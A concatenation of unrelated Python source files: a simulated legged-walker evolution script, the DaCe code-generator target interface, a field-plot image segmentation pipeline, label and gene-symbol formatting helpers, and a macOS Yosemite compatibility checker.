    ns.initializeState(np.zeros(N))
    # Loop through simulated time, use Euler Method to step the nervous
    # system and body. (Fix: the local was previously named `time`, which
    # shadowed the `time` module imported at the top of the file.)
    timesteps = np.arange(0.0, duration, stepsize)
    for _ in timesteps:
        # Set neuron input to angle feedback based on current body state.
        ns.setInputs(np.array([legged.anglefeedback()] * N))
        ns.step(stepsize)                 # Update the nervous system
        legged.step1(stepsize, ns.outputs)  # Update the body
    # Fitness = distance covered over the duration of time.
    return legged.cx / duration
# Microbial GA hyperparameters (consumed by ea.Microbial -- confirm semantics
# against that class).
popsize = 25            # Population size
genesize = N*N + 2*N    # Genome length: N*N weights + N biases + N time constants
recombProb = 0.5        # Recombination probability
mutatProb = 0.01        # Mutation probability
demesize = 2            # Deme (local neighbourhood) size -- presumably for tournament pairing
generations = 30        # Number of generations
init_flux = 0.1         # Initial fluctuation amplitude for the RL learner below
def learningFunction(genotype):
    """Evaluate a genotype with online RL weight fluctuation enabled.

    Uses the same genotype->phenotype mapping as fitnessFunction, but wraps
    the controller in a WalkingTask learner whose weights and biases
    fluctuate and adapt during the run. Returns distance / duration.
    """
    task_params = dict(
        size=2,
        duration=duration,
        stepsize=0.1,
        reward_func=None,
        performance_func=None,
        running_window_mode=True,
        running_window_size=4000,
        performance_update_rate=0.05,
        init_flux_amp=init_flux,
        max_flux_amp=40,
        flux_period_min=300,
        flux_period_max=400,
        flux_conv_rate=0.004,
        learn_rate=0.008,
        bias_init_flux_amp=init_flux,
        bias_max_flux_amp=40,
        bias_flux_period_min=300,
        bias_flux_period_max=400,
        bias_flux_conv_rate=0.004,
    )
    learner = WalkingTask(**task_params)
    learner.setWeights(genotype[0:N * N].reshape((N, N)))
    learner.setBiases(genotype[N * N:N * N + N])
    learner.setTimeConstants(genotype[N * N + N:])
    learner.initializeState(np.zeros(N))
    body = leggedwalker.LeggedAgent()
    learner.simulate(body, learning_start=4000, trackpercent=1.00)
    return body.cx / duration
#create dictionary of 10 parallel processes
#each process is alternating between evo and evo+learn
#num_process = 4
#function = {'evo': fitnessFunction, 'learn':learningFunction}
#function_keys = list(function.keys())
#genetic = {function_keys[i%2]+f'{i//2}':ea.Microbial(function[function_keys[i%2]], popsize, genesize, recombProb, mutatProb, demesize, generations) for i in range(num_process)}
#with concurrent.futures.ProcessPoolExecutor() as executor:
# s = [executor.submit(genetic[function_keys[i%2]+f"{i//2}"].run) for i in range(num_process)]
# for p in s:
# print('done')
#style = ['-', ':']
#
#results = dict()
#for i in range(2):
# results[function_keys[i%2]+'best'] = []
# results[function_keys[i%2]+'avg'] = []
#
#
#for i in range(num_process):
# plt.plot(genetic[function_keys[i%2]+f"{i//2}"].bestHistory, label=function_keys[i%2], color='r', ls = style[i%2])
# results[function_keys[i%2]+'best'].append(genetic[function_keys[i%2]+f"{i//2}"].bestHistory)
# plt.plot(genetic[function_keys[i%2]+f"{i//2}"].avgHistory, label=function_keys[i%2], color='k', ls = style[i%2])
# results[function_keys[i%2]+'avg'].append(genetic[function_keys[i%2]+f"{i//2}"].avgHistory)
#plt.plot(np.mean(results['evobest']), label='avgEvoBest', color='c', ls=':')
#plt.plot(np.mean(results['evoavg']), label='avgEvoAvg', color='y', ls=':')
#plt.plot(np.mean(results['learnbest']), label='avgLearnBest', color='c', ls='-')
#plt.plot(np.mean(results['learnavg']), label='avgLearnAvg', color='y', ls='-')
#plt.xlabel("Generations")
#plt.ylabel("Fitness")
#plt.title(f"Microbial: Best and average fitness\nBest evo+learn \ninit flux:{init_flux}\nT:{duration}s")
#plt.legend()
#plt.show()
#
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import os
import shutil # which
from typing import Dict, List, Tuple
import warnings
from dace import dtypes, memlet as mm, data as dt
from dace.sdfg import nodes, SDFG, SDFGState, ScopeSubgraphView, graph as gr
from dace.sdfg.utils import dfs_topological_sort
from dace.codegen.instrumentation.provider import InstrumentationProvider
from dace.registry import extensible_enum, make_registry
from dace.codegen.prettycode import CodeIOStream
from dace.codegen.codeobject import CodeObject
@make_registry
class TargetCodeGenerator(object):
    """ Interface dictating functions that generate code for:
          * Array allocation/deallocation/initialization/copying
          * Scope (map, consume) code generation
    """
    # NOTE: methods with a default body (return []/pass/False) are optional
    # hooks; methods that raise NotImplementedError must be overridden by
    # concrete targets.

    def get_generated_codeobjects(self) -> List[CodeObject]:
        """ Returns a list of generated `CodeObject` classes corresponding
            to files with generated code. If an empty list is returned
            (default) then this code generator does not create new files.

            @see: CodeObject
        """
        return []

    def on_target_used(self) -> None:
        """
        Called before generating frame code (headers / footers) on this target
        if it was dispatched for any reason. Can be used to set up state struct
        fields.
        """
        pass

    @property
    def has_initializer(self) -> bool:
        """ Returns True if the target generates a `__dace_init_<TARGET>`
            function that should be called on initialization. """
        return False

    @property
    def has_finalizer(self) -> bool:
        """ Returns True if the target generates a `__dace_exit_<TARGET>`
            function that should be called on finalization. """
        return False

    def generate_state(self, sdfg: SDFG, state: SDFGState,
                       function_stream: CodeIOStream,
                       callsite_stream: CodeIOStream) -> None:
        """ Generates code for an SDFG state, outputting it to the given
            code streams.

            :param sdfg: The SDFG to generate code from.
            :param state: The SDFGState to generate code from.
            :param function_stream: A `CodeIOStream` object that will be
                                    generated outside the calling code, for
                                    use when generating global functions.
            :param callsite_stream: A `CodeIOStream` object that points
                                    to the current location (call-site)
                                    in the code.
        """
        pass

    def generate_scope(self, sdfg: SDFG, dfg_scope: ScopeSubgraphView,
                       state_id: int, function_stream: CodeIOStream,
                       callsite_stream: CodeIOStream) -> None:
        """ Generates code for an SDFG state scope (from a scope-entry node
            to its corresponding scope-exit node), outputting it to the given
            code streams.

            :param sdfg: The SDFG to generate code from.
            :param dfg_scope: The `ScopeSubgraphView` to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param function_stream: A `CodeIOStream` object that will be
                                    generated outside the calling code, for
                                    use when generating global functions.
            :param callsite_stream: A `CodeIOStream` object that points
                                    to the current location (call-site)
                                    in the code.
        """
        raise NotImplementedError('Abstract class')

    def generate_node(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
                      node: nodes.Node, function_stream: CodeIOStream,
                      callsite_stream: CodeIOStream) -> None:
        """ Generates code for a single node, outputting it to the given
            code streams.

            :param sdfg: The SDFG to generate code from.
            :param dfg: The SDFG state to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param node: The node to generate code from.
            :param function_stream: A `CodeIOStream` object that will be
                                    generated outside the calling code, for
                                    use when generating global functions.
            :param callsite_stream: A `CodeIOStream` object that points
                                    to the current location (call-site)
                                    in the code.
        """
        raise NotImplementedError('Abstract class')

    def declare_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
                      node: nodes.Node, nodedesc: dt.Data,
                      global_stream: CodeIOStream,
                      declaration_stream: CodeIOStream) -> None:
        """ Generates code for declaring an array without allocating it,
            outputting to the given code streams.

            :param sdfg: The SDFG to generate code from.
            :param dfg: The SDFG state to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param node: The data node to generate allocation for.
            :param nodedesc: The data descriptor to allocate.
            :param global_stream: A `CodeIOStream` object that will be
                                  generated outside the calling code, for
                                  use when generating global functions.
            :param declaration_stream: A `CodeIOStream` object that points
                                       to the point of array declaration.
        """
        raise NotImplementedError('Abstract class')

    def allocate_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
                       node: nodes.Node, nodedesc: dt.Data,
                       global_stream: CodeIOStream,
                       declaration_stream: CodeIOStream,
                       allocation_stream: CodeIOStream) -> None:
        """ Generates code for allocating an array, outputting to the given
            code streams.

            :param sdfg: The SDFG to generate code from.
            :param dfg: The SDFG state to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param node: The data node to generate allocation for.
            :param nodedesc: The data descriptor to allocate.
            :param global_stream: A `CodeIOStream` object that will be
                                  generated outside the calling code, for
                                  use when generating global functions.
            :param declaration_stream: A `CodeIOStream` object that points
                                       to the point of array declaration.
            :param allocation_stream: A `CodeIOStream` object that points
                                      to the call-site of array allocation.
        """
        raise NotImplementedError('Abstract class')

    def deallocate_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
                         node: nodes.Node, nodedesc: dt.Data,
                         function_stream: CodeIOStream,
                         callsite_stream: CodeIOStream) -> None:
        """ Generates code for deallocating an array, outputting to the given
            code streams.

            :param sdfg: The SDFG to generate code from.
            :param dfg: The SDFG state to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param node: The data node to generate deallocation for.
            :param nodedesc: The data descriptor to deallocate.
            :param function_stream: A `CodeIOStream` object that will be
                                    generated outside the calling code, for
                                    use when generating global functions.
            :param callsite_stream: A `CodeIOStream` object that points
                                    to the current location (call-site)
                                    in the code.
        """
        raise NotImplementedError('Abstract class')

    def copy_memory(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
                    src_node: nodes.Node, dst_node: nodes.Node,
                    edge: gr.MultiConnectorEdge[mm.Memlet],
                    function_stream: CodeIOStream,
                    callsite_stream: CodeIOStream) -> None:
        """ Generates code for copying memory, either from a data access
            node (array/stream) to another, a code node (tasklet/nested
            SDFG) to another, or a combination of the two.

            :param sdfg: The SDFG to generate code from.
            :param dfg: The SDFG state to generate code from.
            :param state_id: The node ID of the state in the given SDFG.
            :param src_node: The source node to generate copy code for.
            :param dst_node: The destination node to generate copy code for.
            :param edge: The edge representing the copy (in the innermost
                         scope, adjacent to either the source or destination
                         node).
            :param function_stream: A `CodeIOStream` object that will be
                                    generated outside the calling code, for
                                    use when generating global functions.
            :param callsite_stream: A `CodeIOStream` object that points
                                    to the current location (call-site)
                                    in the code.
        """
        raise NotImplementedError('Abstract class')
class IllegalCopy(TargetCodeGenerator):
    """ A code generator registered for copies that the SDFG must never
        contain; dispatching to it always raises. """
    def copy_memory(self, sdfg, dfg, state_id, src_node, dst_node, edge,
                    function_stream, callsite_stream):
        # Any copy routed here is by definition invalid -- fail loudly.
        raise TypeError(f'Illegal copy! (from {src_node} to {dst_node})')
def make_absolute(path: str) -> str:
    """
    Finds an executable and returns an absolute path out of it. Used when
    finding compiler executables.

    :param path: Executable name, relative path, or absolute path.
    :return: Absolute path pointing to the same file as ``path``.
    """
    if not os.path.isfile(path):
        # Not a path to an existing file -- probably just an executable name,
        # such as "g++". Try to find it on the PATH.
        found = shutil.which(path)
        if not found:
            warnings.warn("Could not find executable \"{}\"".format(path))
            found = path
        return found.replace('\\', '/')
    if os.path.isabs(path):
        # Already absolute, we're happy.
        return path
    # Relative path to an existing file: make it absolute.
    return os.path.abspath(path)
|
import os
import argparse
import numpy as np
from skimage.morphology import disk
from jicbioimage.core.io import AutoName, AutoWrite
from jicbioimage.core.image import Image
from jicbioimage.core.transform import transformation
from jicbioimage.transform import (
threshold_otsu,
remove_small_objects,
erode_binary,
)
from jicbioimage.segment import connected_components, watershed_with_seeds
from dtoolcore import DataSet
from utils import (
red_channel,
green_channel,
difference,
fill_small_holes,
)
from segment import filter_sides, filter_touching_border
from jicgeometry import Point2D
def find_approx_plot_locs(dataset, identifier):
    """Return a 6x5 grid of approximate plot locations.

    The locations are linearly interpolated between three annotated corner
    coordinates stored in the dataset's "coords" overlay.
    """
    corners = dataset.access_overlays()["coords"][identifier]

    def as_point(coords):
        return Point2D(float(coords['x']), float(coords['y']))

    top_left = as_point(corners['topLeft'])
    vdiff = as_point(corners['bottomLeft']) - top_left
    hdiff = as_point(corners['topRight']) - top_left

    # Same ordering as the original nested loops: horizontal index outer,
    # vertical index inner.
    return [top_left + hdiff * hmult + vdiff * vmult
            for hmult in np.linspace(0, 1, 6)
            for vmult in np.linspace(0, 1, 5)]
def normalise_array(array):
    """Linearly rescale `array` to the range [0, 1].

    Bug fix: a constant array previously divided by zero, producing
    NaNs (and a runtime warning); such arrays now map to all zeros.
    """
    a_min = array.min()
    a_max = array.max()
    if a_max == a_min:
        # No dynamic range to normalise; avoid division by zero.
        return np.zeros_like(array, dtype=float)
    return (array - a_min) / (a_max - a_min)
def force_to_uint8(array):
    """Rescale an array to span 0..255 and cast it to uint8."""
    rescaled = normalise_array(array) * 255
    return rescaled.astype(np.uint8)
@transformation
def sklocal(image):
    """Local entropy filter (disk of radius 5), rescaled to uint8."""
    from skimage.filters.rank import entropy
    filtered = entropy(image, disk(5))
    return force_to_uint8(filtered)
@transformation
def skmean(image):
    """Mean filter with a disk of radius 30."""
    from skimage.filters.rank import mean
    mean_filtered = mean(image, disk(30))
    # Debug output of the filtered range. Fix: the original used a
    # Python-2-only `print a, b` statement (a syntax error under Python 3);
    # this form prints the same "min max" text on both versions.
    print("{} {}".format(mean_filtered.min(), mean_filtered.max()))
    return mean_filtered
@transformation
def distance_transform(image):
    """Distance map of the binary image via the medial axis transform."""
    from skimage.morphology import medial_axis
    skeleton, distances = medial_axis(image, return_distance=True)
    return distances
@transformation
def segment(image, seeds=None):
    """Return field plots."""
    intensity = skmean(sklocal(green_channel(image)))
    mask = threshold_otsu(intensity)
    mask = remove_small_objects(mask, min_size=1000)
    mask = fill_small_holes(mask, min_size=100)
    # The returned distance map was never used by the original either; the
    # call is kept because the @transformation decorator presumably records
    # intermediate images as a side effect -- confirm before removing.
    distance_transform(mask)
    if seeds is None:
        # Derive seeds from the mask when none are supplied.
        seeds = erode_binary(mask, selem=disk(10))
        seeds = remove_small_objects(seeds, min_size=100)
        seeds = connected_components(seeds, background=0)
    return watershed_with_seeds(intensity, seeds=seeds, mask=mask)
@transformation
def filter_by_size(plots):
    """Remove plots the size of which lies outside particular min and max plot
    sizes."""
    min_plot_size = 20000   # TODO - set relative to median?
    max_plot_size = 120000
    # Snapshot the identifiers before mutating the segmentation.
    identifiers = plots.identifiers
    for identifier in identifiers:
        area = plots.region_by_identifier(identifier).area
        if not (min_plot_size <= area <= max_plot_size):
            plots.remove_region(identifier)
    return plots
def generate_seed_image(image, dataset, identifier):
    """Create a labelled seed image for watershed segmentation.

    Bug fix: labels now start at 1. The original started enumerate at 0,
    so the first seed received label 0 -- the value treated as background
    by connected_components(background=0)/watershed -- and was silently
    discarded.
    """
    seeds_as_list = find_approx_plot_locs(dataset, identifier)
    xdim, ydim, _ = image.shape
    seeds = np.zeros((xdim, ydim), dtype=np.uint8)
    # NOTE(review): locations are treated here as fractional (0..1)
    # coordinates, but find_approx_plot_locs appears to return absolute
    # pixel coordinates -- confirm which convention the overlay uses.
    for n, seed in enumerate(seeds_as_list, start=1):
        xfrac, yfrac = seed
        x = int(yfrac * xdim)
        y = int(xfrac * ydim)
        seeds[x, y] = n
    return seeds
def generate_output_filename(dataset, identifier, output_path, suffix=""):
    """Build an output path from the item's source filename plus a suffix.

    E.g. /data/img1.png with suffix "-segmented" -> <output_path>/img1-segmented.png
    """
    source_basename = os.path.basename(dataset.abspath_from_identifier(identifier))
    stem, extension = os.path.splitext(source_basename)
    return os.path.join(output_path, stem + suffix + extension)
def save_segmented_image_as_rgb(segmented_image, filename):
    """Write the segmentation's unique-colour rendering to a PNG file."""
    png_bytes = segmented_image.unique_color_image.png()
    with open(filename, 'wb') as fh:
        fh.write(png_bytes)
def process_single_identifier(dataset, identifier, output_path):
    """Segment one dataset item and write '-segmented' and '-false_colour' PNGs."""
    print("Processing {}".format(identifier))
    image = Image.from_file(dataset.abspath_from_identifier(identifier))
    seeds = generate_seed_image(image, dataset, identifier)
    # Segment, then drop side plots and plots touching the image border.
    segmentation = filter_touching_border(filter_sides(segment(image, seeds)))

    segmented_filename = generate_output_filename(
        dataset, identifier, output_path, '-segmented')
    save_segmented_image_as_rgb(segmentation, segmented_filename)

    false_colour_filename = generate_output_filename(
        dataset, identifier, output_path, '-false_colour')
    with open(false_colour_filename, 'wb') as fh:
        fh.write(segmentation.png())
def identifiers_where_overlay_is_true(dataset, overlay_name):
    """Return the identifiers whose value in the named overlay is truthy."""
    overlay = dataset.access_overlays()[overlay_name]
    return [identifier for identifier in dataset.identifiers
            if overlay[identifier]]
def identifiers_where_overlay_matches_value(dataset, overlay_name, value):
    """Return the identifiers whose value in the named overlay equals `value`."""
    overlay = dataset.access_overlays()[overlay_name]
    return [identifier for identifier in dataset.identifiers
            if overlay[identifier] == value]
def explore_dataset(dataset, output_path, n=1):
    """Process the first `n` items whose 'ordering' overlay equals 1."""
    selected = identifiers_where_overlay_matches_value(dataset, 'ordering', 1)
    print(selected)
    for ident in selected[:n]:
        process_single_identifier(dataset, ident, output_path)
def main():
    """CLI entry point: segment every selected image of a dataset."""
    parser = argparse.ArgumentParser()
    parser.add_argument('dataset_path', help='Path to dataset')
    parser.add_argument('output_path', help='Output directory')
    args = parser.parse_args()

    # Route jicbioimage's automatic debug/intermediate output to output_path.
    AutoName.directory = args.output_path
    explore_dataset(DataSet.from_path(args.dataset_path), args.output_path, n=1)


if __name__ == '__main__':
    main()
|
# Repository: bschilder/public-resources
import re
import mygene
def label_txt_formatter(label, max_len=None):
    '''
    Given a label text, return an abbreviated text (for figure).

    Applies an ordered list of regex substitutions, truncates to `max_len`
    characters (appending "..") when requested, and upper-cases the first
    character.

    Bug fix: an empty label previously raised IndexError on the final
    `formatted[0]` access; it is now returned unchanged.
    '''
    # Ordered (pattern, replacement) pairs; order matters (e.g. the specific
    # 'deep venous thrombosis \\(dvt\\)' rule must run before the bare 'dvt').
    replace_strs = [
        ('_', ' '),
        (r'\(right\)$', '(R)'),
        (r'\(left\)$', '(L)'),
        (r'percentage', '%'),
        (r'90th percentile', '90PCTL'),
        (r'number', '#'),
        (r'Number', '#'),
        (r'Volume of', 'Vol.'),
        (r'predicted', 'pred.'),
        (r'blood pressure', 'BP'),
        (r'Average', 'Ave.'),
        (r'average', 'ave.'),
        (r', automated reading', ' (AR)'),
        (r'cholelithiasis/gall stones', 'Gallstones'),
        (r'Body mass index \(BMI\)', 'BMI'),
        (r'Creatinine \(enzymatic\) in urine', 'Creatinine in urine'),
        (r'Weighted-mean', 'WA'),
        (r'treatments/medications', 'medications'),
        (r'Peak expiratory flow \(PEF\)', 'PEF'),
        (r'Forced expiratory volume in 1-second \(FEV1\)', 'FEV1'),
        (r'Forced vital capacity \(FVC\)', 'FVC'),
        (r'statistic', 'stat.'),
        (r"Alzheimer's disease/dementia", "Alzheimer's/dementia"),
        (r'Time spend outdoors in', 'Outdoor time,'),
        (r'Time spent outdoors in', 'Outdoor time,'),
        (r'Nitrogen dioxide', 'NO2'),
        (r'Particulate matter ', ''),
        (r'sound level of noise pollution', 'noise lvl.'),
        (r'platelet \(thrombocyte\)', 'platelet'),
        (r'White blood cell \(leukocyte\)', 'White blood cell'),
        (r'Red blood cell \(erythrocyte\)', 'Red blood cell'),
        (r'Age at menopause \(last menstrual period\)', 'Age at menopause'),
        (r'difficulty/problems', 'problems'),
        (r'Nucleated red blood cell', 'Nuc. red blood cell'),
        (r'night-time', 'nighttime'),
        (r'air pollution', 'air poll.'),
        (r';', ''),
        (r'heart attack/myocardial infarction', 'heart attack (MI)'),
        (r'Childhood sunburn occasions', 'Childhood sunburn'),
        (r'deep venous thrombosis \(dvt\)', 'DVT'),
        (r'dvt', 'DVT'),
        (r'pulmonary embolism', 'PE'),
        (r'hereditary/genetic', 'genetic'),
    ]
    formatted = label
    for pattern, repl in replace_strs:
        formatted = re.sub(pattern, repl, formatted)
    if max_len is not None and len(formatted) > max_len:
        formatted = '{}..'.format(formatted[:max_len])
    if not formatted:
        # Guard against the empty string (original raised IndexError here).
        return formatted
    return formatted[0].capitalize() + formatted[1:]
def mygene_conv(mg, ens):
    """Map Ensembl gene IDs to gene symbols via a mygene client.

    IDs without a symbol mapping are dropped; order of `ens` is preserved.
    """
    ginfo = mg.querymany(
        ens,
        scopes='ensembl.gene',
        fields='symbol',
        species='human',
        as_dataframe=True,
        df_index=False,
    ).dropna()
    if 'symbol' in ginfo.keys():
        conv_dict = dict(zip(ginfo['query'], ginfo['symbol']))
    else:
        conv_dict = {}
    return [conv_dict[ens_id] for ens_id in ens if ens_id in conv_dict]
def label_txt_formatter_gene(label, gene_dict=None, italic=True):
    """Format a (possibly comma-separated Ensembl ID) label for a figure.

    Ensembl IDs are mapped to gene symbols via `gene_dict` when provided,
    falling back to a live mygene query; 'others' becomes 'Others'; anything
    else is passed through. `italic` wraps the result in mathtext italics.
    """
    def render(text):
        # Wrap in matplotlib mathtext italics when requested.
        return r"$\it{" + text + "}$" if italic else text

    if label == 'others':
        return 'Others'
    if not label.startswith('ENSG'):
        return render(label)

    ens_ids = label.split(',')
    if gene_dict is not None:
        symbols = [gene_dict[e] for e in ens_ids if e in gene_dict]
    else:
        symbols = []
    if symbols:
        return render(','.join(symbols))

    # No local mapping -- fall back to querying mygene directly.
    symbols = mygene_conv(mygene.MyGeneInfo(), ens_ids)
    if symbols:
        return render(','.join(symbols))
    return render(label)
|
# Source file: check-10.10-yosemite-compatibility.py
#!/usr/bin/env python
# encoding: utf-8
# ================================================================================
# check-yosemite-compatibility.py
#
# This script checks if the current system is compatible with OS X 10.10 Yosemite.
# These checks are based on the installCheckScript and volCheckScript in
# /Applications/Install OS X Yosemite.app/Contents/SharedSupport/OSInstall.mpkg/Distribution
#
# The checks used in this script are:
# - Machine has a specific supported board-id or is a virtual machine
# - 64 bit capable CPU
# - At least 2 GB of memory
# - Current system version is less than 10.10
# - Current system version is at least 10.6.6 or newer
#
# Exit codes:
# 0 = Yosemite is supported
# 1 = Yosemite is not supported
#
#
# <NAME> <<EMAIL>>
# https://github.com/hjuutilainen/adminscripts
#
# ================================================================================
import sys
import subprocess
import os
import re
import plistlib
from distutils.version import StrictVersion
from Foundation import CFPreferencesCopyAppValue
# ================================================================================
# Start configuration
# ================================================================================
# Set this to False if you don't want any output, just the exit codes
# Controls logger() output only; the exit code remains the machine-readable
# result either way.
verbose = True

# Set this to True if you want to add "yosemite_supported" custom conditional to
# /Library/Managed Installs/ConditionalItems.plist
update_munki_conditional_items = False
# ================================================================================
# End configuration
# ================================================================================
def logger(message, status, info):
    """Print a formatted '   message: status  [info]' line when verbose."""
    if verbose:
        # Fix: the original used a Python-2-only `print "..." % (...)`
        # statement. The parenthesised form passes a single pre-formatted
        # string, so the output is byte-identical on Python 2 and 3.
        print("%14s: %-40s [%s]" % (message, status, info))
def conditional_items_path():
    """Return the path to munki's ConditionalItems.plist.

    Reads ManagedInstallDir from the ManagedInstalls preferences and falls
    back to the munki default location.
    <http://code.google.com/p/munki/wiki/ConditionalItems>
    """
    managed_installs_dir = CFPreferencesCopyAppValue('ManagedInstallDir',
                                                     'ManagedInstalls')
    # Make sure we're outputting our information to "ConditionalItems.plist".
    if managed_installs_dir:
        return os.path.join(managed_installs_dir, 'ConditionalItems.plist')
    # Munki default
    return "/Library/Managed Installs/ConditionalItems.plist"
def munki_installed():
    """Return True when the munki core package is installed (pkgutil query)."""
    cmd = ["pkgutil", "--pkg-info", "com.googlecode.munki.core"]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    proc.communicate()
    return proc.returncode == 0
def is_system_version_supported():
    """Return True when 10.6.6 <= current system version < 10.10."""
    # NOTE(review): plistlib.readPlist was removed in Python 3.9; fine for
    # the Python 2 runtime this script targets.
    system_version_plist = plistlib.readPlist(
        "/System/Library/CoreServices/SystemVersion.plist")
    product_name = system_version_plist['ProductName']
    product_version = system_version_plist['ProductVersion']
    label = "%s %s" % (product_name, product_version)
    version = StrictVersion(product_version)
    if version >= StrictVersion('10.10'):
        # Already on (or past) Yosemite.
        logger("System", label, "Failed")
        return False
    if version >= StrictVersion('10.6.6'):
        logger("System", label, "OK")
        return True
    # Too old to upgrade directly.
    logger("System", label, "Failed")
    return False
def get_board_id():
    """Return the machine's board-id from IODeviceTree, or None.

    Pipes `ioreg` through grep and extracts the quoted value; anything that
    does not look like a Mac board-id yields None.
    """
    cmd = ["/usr/sbin/ioreg",
           "-p", "IODeviceTree",
           "-r",
           "-n", "/",
           "-d", "1"]
    p1 = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE)
    p2 = subprocess.Popen(["/usr/bin/grep", "board-id"],
                          stdin=p1.stdout, stdout=subprocess.PIPE)
    results = p2.communicate()[0]
    board_id = re.sub(r"^\s*\"board-id\" = <\"(.*)\">$", r"\1", results).strip()
    return board_id if board_id.startswith('Mac') else None
def is_64bit_capable():
    """Return True when the CPU is 64-bit capable (sysctl hw.cpu64bit_capable).

    BUG FIX: the original tested `bool(results)`, which is True for ANY
    non-empty output -- including "0\n" from a non-64-bit CPU -- so the check
    always passed.  The sysctl value must be parsed as an integer instead.
    """
    cmd = ["/usr/sbin/sysctl", "-n", "hw.cpu64bit_capable"]
    p = subprocess.Popen(cmd, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    (results, err) = p.communicate()
    try:
        capable = int(results.strip()) != 0
    except ValueError:
        # Unparseable / empty output: treat as not capable
        capable = False
    if capable:
        logger("CPU",
               "64 bit capable",
               "OK")
        return True
    else:
        logger("CPU",
               "not 64 bit capable",
               "Failed")
        return False
def has_required_amount_of_memory():
    """Return True when at least 2 GB of physical memory is installed.

    Reads hw.memsize via sysctl and logs the outcome through logger().
    """
    required_bytes = 2048 * 1024 * 1024  # 2 GB
    proc = subprocess.Popen(["/usr/sbin/sysctl", "-n", "hw.memsize"],
                            bufsize=1,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    output, _ = proc.communicate()
    installed_bytes = int(output)
    installed_gigabytes = installed_bytes / 1024 / 1024 / 1024
    if installed_bytes >= required_bytes:
        logger("Memory",
               "%i GB physical memory installed" % installed_gigabytes,
               "OK")
        return True
    logger("Memory",
           "%i GB installed, 2 GB required" % installed_gigabytes,
           "Failed")
    return False
def is_virtual_machine():
    """Return True when the CPU feature list advertises the VMM flag,
    i.e. the machine is running inside a hypervisor."""
    proc = subprocess.Popen(["/usr/sbin/sysctl", "-n", "machdep.cpu.features"],
                            bufsize=1,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    output, _ = proc.communicate()
    # Whitespace-separated feature tokens; VMM is set under virtualization
    if "VMM" in output.split():
        logger("Board ID",
               "Virtual machine",
               "OK")
        return True
    return False
def is_supported_board_id():
    """Return True when this machine's board-id is on the Yosemite support list.

    Virtual machines are always considered supported.

    BUG FIX: the original list was missing a comma after "Mac-F2218EC8", so
    Python's implicit string concatenation fused it with the next line into
    "Mac-F2218EC8Mac-F2218FA9" -- neither "Mac-F2218EC8" nor "Mac-F2218FA9"
    ever matched.
    """
    if is_virtual_machine():
        return True
    platform_support_values = [
        "Mac-00BE6ED71E35EB86",
        "Mac-031AEE4D24BFF0B1",
        "Mac-031B6874CF7F642A",
        "Mac-189A3D4F975D5FFC",
        "Mac-27ADBB7B4CEE8E61",
        "Mac-2BD1B31983FE1663",
        "Mac-2E6FAB96566FE58C",
        "Mac-35C1E88140C3E6CF",
        "Mac-35C5E08120C7EEAF",
        "Mac-3CBD00234E554E41",
        "Mac-42FD25EABCABB274",
        "Mac-4B7AC7E43945597E",
        "Mac-4BC72D62AD45599E",
        "Mac-50619A408DB004DA",
        "Mac-66F35F19FE2A0D05",
        "Mac-6F01561E16C75D06",
        "Mac-742912EFDBEE19B3",
        "Mac-77EB7D7DAF985301",
        "Mac-7BA5B2794B2CDB12",
        "Mac-7DF21CB3ED6977E5",
        "Mac-7DF2A3B5E5D671ED",
        "Mac-81E3E92DD6088272",
        "Mac-8ED6AF5B48C039E1",
        "Mac-942452F5819B1C1B",
        "Mac-942459F5819B171B",
        "Mac-94245A3940C91C80",
        "Mac-94245B3640C91C81",
        "Mac-942B59F58194171B",
        "Mac-942B5BF58194151B",
        "Mac-942C5DF58193131B",
        "Mac-AFD8A9D944EA4843",
        "Mac-C08A6BB70A942AC2",
        "Mac-C3EC7CD22292981F",
        "Mac-F2208EC8",
        "Mac-F2218EA9",
        "Mac-F2218EC8",  # comma restored -- was fused with the next entry
        "Mac-F2218FA9",
        "Mac-F2218FC8",
        "Mac-F221BEC8",
        "Mac-F221DCC8",
        "Mac-F222BEC8",
        "Mac-F2238AC8",
        "Mac-F2238BAE",
        "Mac-F223BEC8",
        "Mac-F22586C8",
        "Mac-F22587A1",
        "Mac-F22587C8",
        "Mac-F22589C8",
        "Mac-F2268AC8",
        "Mac-F2268CC8",
        "Mac-F2268DAE",
        "Mac-F2268DC8",
        "Mac-F2268EC8",
        "Mac-F226BEC8",
        "Mac-F22788AA",
        "Mac-F227BEC8",
        "Mac-F22C86C8",
        "Mac-F22C89C8",
        "Mac-F22C8AC8",
        "Mac-F42386C8",
        "Mac-F42388C8",
        "Mac-F4238BC8",
        "Mac-F4238CC8",
        "Mac-F42C86C8",
        "Mac-F42C88C8",
        "Mac-F42C89C8",
        "Mac-F42D86A9",
        "Mac-F42D86C8",
        "Mac-F42D88C8",
        "Mac-F42D89A9",
        "Mac-F42D89C8",
        "Mac-F60DEB81FF30ACF6",
        "Mac-F65AE981FFA204ED",
        "Mac-FA842E06C61E91C5",
        "Mac-FC02E91DDD3FA6A4"]
    board_id = get_board_id()
    if board_id in platform_support_values:
        logger("Board ID",
               board_id,
               "OK")
        return True
    else:
        # board_id may be None here when detection failed
        logger("Board ID",
               "\"%s\" is not supported" % board_id,
               "Failed")
        return False
def append_conditional_items(dictionary):
    """Merge `dictionary` into munki's ConditionalItems.plist on disk.

    Existing keys are preserved unless `dictionary` overrides them
    (dict(existing + new): later pairs win).  Uses the Python 2 plistlib
    read/write API.
    """
    current_conditional_items_path = conditional_items_path()
    if os.path.exists(current_conditional_items_path):
        existing_dict = plistlib.readPlist(current_conditional_items_path)
        # Python 2 idiom: concatenating .items() lists merges the two dicts
        output_dict = dict(existing_dict.items() + dictionary.items())
    else:
        output_dict = dictionary
    plistlib.writePlist(output_dict, current_conditional_items_path)
